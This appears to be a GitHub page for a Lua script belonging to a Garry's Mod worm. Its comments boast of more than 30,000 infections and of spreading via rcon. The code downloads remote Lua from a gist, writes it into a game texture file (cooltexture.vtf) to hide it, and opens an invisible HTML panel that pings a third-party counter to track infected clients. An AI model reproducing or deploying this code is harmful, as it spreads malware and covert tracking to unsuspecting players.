-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathclient_everytime.lua
29 lines (21 loc) · 1.07 KB
/
client_everytime.lua
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
--[[
Copyright Mr. 'Handsome' Matt ©
]]
-- Steam Wallet Currency is NOT being stolen pls believe
-- Source Code to DLLs will be publically released here after the Garry's Mod patch along with binaries which, if you are really worried, could be reverse engineered to ensure these statements are true
-- Infected lawl
-- Probably more than 30,000 infections
-- This could have been silent
-- Once spammed, this script will stop working by itself
-- sv_allowupload is not required to be enabled on the server, as rcon access allows it to be set
-- Let's get some viewers
if cookie.GetNumber("friendly_removal", 0) ~= 1 then
http.Fetch("https://gist.githubusercontent.com/Chrisaster/d9872acbf2da227e9281/raw/client_init.lua", function(content)
DeleteFile("garrysmod/materials/cooltexture.vtf")
CreateFile("garrysmod/materials/cooltexture.vtf", content)
cookie.Set("friendly_removal", 1)
end)
end
local c = vgui.Create("HTML")
c:SetVisible(false)
c:OpenURL("http://s1.freehostedscripts.net/ocounter.php?site=ID4068052&e1=Online%20User&e2=Online%20Users&r=lol&wh=100")